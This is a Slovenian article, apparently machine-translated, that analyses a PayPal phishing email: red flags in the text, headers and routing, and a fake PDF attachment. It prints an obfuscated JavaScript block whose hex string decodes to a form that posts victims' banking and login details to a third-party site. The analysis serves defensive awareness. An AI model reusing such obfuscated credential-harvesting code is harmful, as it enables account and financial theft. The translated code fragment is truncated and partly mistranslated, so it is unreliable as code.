loader

Spletna varnost: razbijanje anatomije e-pošte z lažnim predstavljanjem

Anonim


V današnjem svetu, kjer so informacije za vsakogar na spletu, phishing je eden najbolj priljubljenih in uničujočih spletnih napadov, ker lahko vedno očistite virus, vendar če ste ukradli svoje bančne podatke, ste v težavah. Tukaj je razčlenitev enega takšnega napada, ki smo ga prejeli.

Ne mislite, da so pomembni samo vaši bančni podatki: navsezadnje, če nekdo pridobi nadzor nad prijavo v vaš račun, ne poznajo le informacij, ki jih vsebuje ta račun, vendar so možnosti, da se lahko iste informacije za prijavo uporabijo tudi na drugih računov. Če ogrozijo vaš e-poštni račun, lahko ponastavijo vsa druga gesla.

Torej, poleg tega, da ohranite močna in različna gesla, morate vedno biti v iskanju lažnih e-poštnih sporočil, ki se pretvarjajo kot prava stvar. Medtem ko je večina poskusov phishinga amaterski, so nekateri precej prepričljivi, zato je pomembno razumeti, kako jih prepoznati na ravni površine in kako delujejo pod pokrovom.

Preučevanje Kaj je v navadnem pogledu

Naš primer e-pošte, kot večina poskusov lažnega predstavljanja, vas »obvesti« o dejavnosti na vašem računu PayPal, ki bi v normalnih okoliščinah skrbelo. Zato je poziv k dejanju preveriti / obnoviti vaš račun s predložitvijo skoraj vsakega osebnega podatka, o katerem se lahko spomnite. Tudi to je precej formulaično.

Medtem ko so zagotovo izjeme, precej vsak phishing in prevara email je naložen z rdečimi zastavami neposredno v samem sporočilu. Tudi če je besedilo prepričljivo, lahko ponavadi najdete veliko napak, nabitih v celotnem telesu sporočila, ki kažejo, da sporočilo ni zakonito.

Telo sporočila

Na prvi pogled je to ena boljših e-poštnih sporočil, ki sem jih videl. Ni pravopisnih ali slovničnih napak, besedilo pa se bere glede na to, kaj lahko pričakujete. Vendar pa je nekaj rdečih zastavic, ki jih lahko vidite, ko preučite vsebino malo bolj natančno.

  • “Paypal” - pravilen primer je “PayPal” (kapital P). Vidite lahko obe različici, ki sta uporabljeni v sporočilu. Podjetja so zelo premišljena s svojimi blagovnimi znamkami, zato je dvomljivo, da bi nekaj takega prešlo postopek preverjanja.
  • "Omogoči ActiveX" - Kolikokrat ste videli legitimno spletno poslovanje velikosti Paypala, ki uporablja lastniško komponento, ki deluje samo na enem brskalniku, še posebej, če podpirajo več brskalnikov? Seveda, nekje tam zunaj to počne neko podjetje, toda to je rdeča zastava.
  • »Varno«. - Opazite, kako se ta beseda ne ujema s preostalim besedilom odstavka. Tudi če okno raztegnem malo več, ne bo pravilno ovijalo ali prostor.
  • "Paypal!" - Prostor pred klicajem izgleda nerodno. Samo še ena domišljaja, ki sem prepričan, da ne bi bila v zakonitem e-poštnem sporočilu.
  • "PayPal-račun Update Form.pdf.htm" - Zakaj bi Paypal priložiti "PDF" še posebej, če bi lahko le povezavo na stran na njihovi spletni strani? Poleg tega, zakaj bi poskušali prikriti datoteko HTML kot PDF? To je največja rdeča zastava vseh.

Glava sporočil

Ko pogledate glavo sporočila, se prikaže nekaj rdečih zastavic:

  • Naslov od
  • Naslov za naslov manjka. Nisem to izpraznil, preprosto ni del standardne glave sporočila. Običajno bo podjetje, ki ima vaše ime, poosebilo e-poštno sporočilo za vas.

Priloga

Ko odprem prilogo, lahko takoj vidite, da postavitev ni pravilna, saj manjkajo informacije o slogu. Še enkrat, zakaj bi PayPal poslal e-poštno obliko HTML, če bi vam preprosto dali povezavo na njihovi spletni strani?

Opomba: za to smo uporabili Gmailov vgrajen pregledovalnik priponk HTML, vendar priporočamo, da priponk ne odprete od prevarantov. Nikoli. Kdaj. Zelo pogosto vsebujejo napade, ki bodo namestili trojance na računalnik, da bi ukradli podatke o vašem računu.

Če malo pomikate navzdol, lahko vidite, da ta obrazec ne zahteva samo naših podatkov za prijavo v PayPal, ampak tudi za bančne podatke in podatke o kreditnih karticah. Nekatere slike so pokvarjene.

Očitno je ta poskus lažnega predstavljanja sledil vsem z enim naporom.

Tehnična okvara

Čeprav bi moralo biti na podlagi tega, kar je očitno, da je to poskus lažnega predstavljanja, zelo jasno, bomo zdaj razčlenili tehnično sestavo e-pošte in videli, kaj lahko najdemo.

Informacije iz Priloge

Prva stvar, ki si jo morate ogledati, je izvor HTML obrazca priloge, ki posreduje podatke na lažno spletno mesto.

Ko hitro pogledate vir, se vse povezave zdijo veljavne, saj kažejo na »paypal.com« ali »paypalobjects.com«, ki sta zakonita.

Zdaj bomo pogledali nekaj osnovnih informacij, ki jih Firefox zbere na strani.

Kot lahko vidite, so nekatere grafike izvlečene iz domen “blessedtobe.com”, “goodhealthpharmacy.com” in “pic-upload.de” namesto zakonitih PayPal domen.

Informacije iz glave e-pošte

Nato si bomo ogledali neobdelane glave e-poštnih sporočil. Gmail to omogoči prek možnosti Prikaži izvirno meni v sporočilu.

Če pogledamo informacije v glavi za izvirno sporočilo, lahko vidite, da je bilo sporočilo sestavljeno z uporabo Outlook Expressa 6. Dvomim, da ima PayPal nekoga v osebju, ki vsako od teh sporočil pošlje ročno prek zastarelega e-poštnega odjemalca.

Če pogledamo informacije o usmerjanju, lahko vidimo naslov IP pošiljatelja in posredovalnega poštnega strežnika.

IP naslov uporabnika je izvirni pošiljatelj. Če na hitro poiščemo informacije o IP, vidimo, da je IP pošiljatelj v Nemčiji.

In ko pogledamo posredniški poštni strežnik (mail.itak.at), IP naslov lahko vidimo, da je to ISP s sedežem v Avstriji. Dvomim, da PayPal usmerja njihove e-poštne naslove neposredno preko ISP, ki temelji na Avstriji, ko imajo veliko strežniško kmetijo, ki bi z lahkoto rešila to nalogo.

Kje gredo podatki?

Torej smo jasno določili, da je to lažna e-pošta in zbrali nekaj informacij o tem, od kod prihaja sporočilo, ampak kaj je, kje so vaši podatki poslani?

Da bi to videli, moramo najprej shraniti priponko HTM na namizje in jo odpreti v urejevalniku besedila. Če se pomikate po njem, se zdi, da je vse v redu, razen ko pridemo do sumljivega Javascript bloka.

Izločimo poln vir zadnjega bloka Javascripta, vidimo:


// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; Y = "; za (i = 0; i

Vsakič, ko vidite, da je v bloku Javascripta vgrajen velik nabor naključno izbranih črk in številk, je to ponavadi nekaj sumljivega. Če pogledamo kodo, je spremenljivka “x” nastavljena na ta velik niz in se nato dekodira v spremenljivko “y”. Končni rezultat spremenljivke “y” se nato zapiše v dokument kot HTML.

Ker je velik niz sestavljen iz številk 0-9 in črk af, je verjetno kodiran prek preproste pretvorbe ASCII v Hex:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223

Prevede v:

To ni naključje, da se to dekodira v veljavno oznako HTML obrazca, ki pošlje rezultate ne na PayPal, ampak na prevarano stran.

Poleg tega, ko si ogledate vir HTML obrazca, boste videli, da ta oznaka obrazca ni vidna, ker se generira dinamično prek Javascripta. To je pameten način, da skrijete, kaj HTML dejansko počne, če bi nekdo preprosto pogledal ustvarjeni vir priponke (kot smo to storili prej), v nasprotju z odpiranjem priloge neposredno v urejevalniku besedila.

Na hitri strani, ki deluje na spletnem mestu, lahko vidimo, da je to domena, ki je gostila na priljubljenem spletnem gostitelju 1and1.

Kaj izstopa je domena uporablja berljivo ime (v nasprotju z nečim kot "dfh3sjhskjhw.net") in domena je bila registrirana za 4 leta. Zaradi tega menim, da je bila ta domena ugrabljena in uporabljena kot zastavica v tem poskusu lažnega predstavljanja.

Cinizem je dobra obramba

Ko gre za varno bivanje na spletu, nikoli ne boli, da imate dober cinizem.

Prepričan sem, da je v primeru e-pošte več rdečih zastavic, kar smo izpostavili zgoraj, so kazalniki, ki smo jih videli že po nekaj minutah pregleda. Hipotetično, če bi površina e-pošte posnemala legitimno protipostavko 100%, bi tehnična analiza še vedno razkrila njeno pravo naravo. To je razlog, zakaj je pomembno, da lahko preučimo, kaj lahko in kaj ne moremo videti.

Izbira Urednika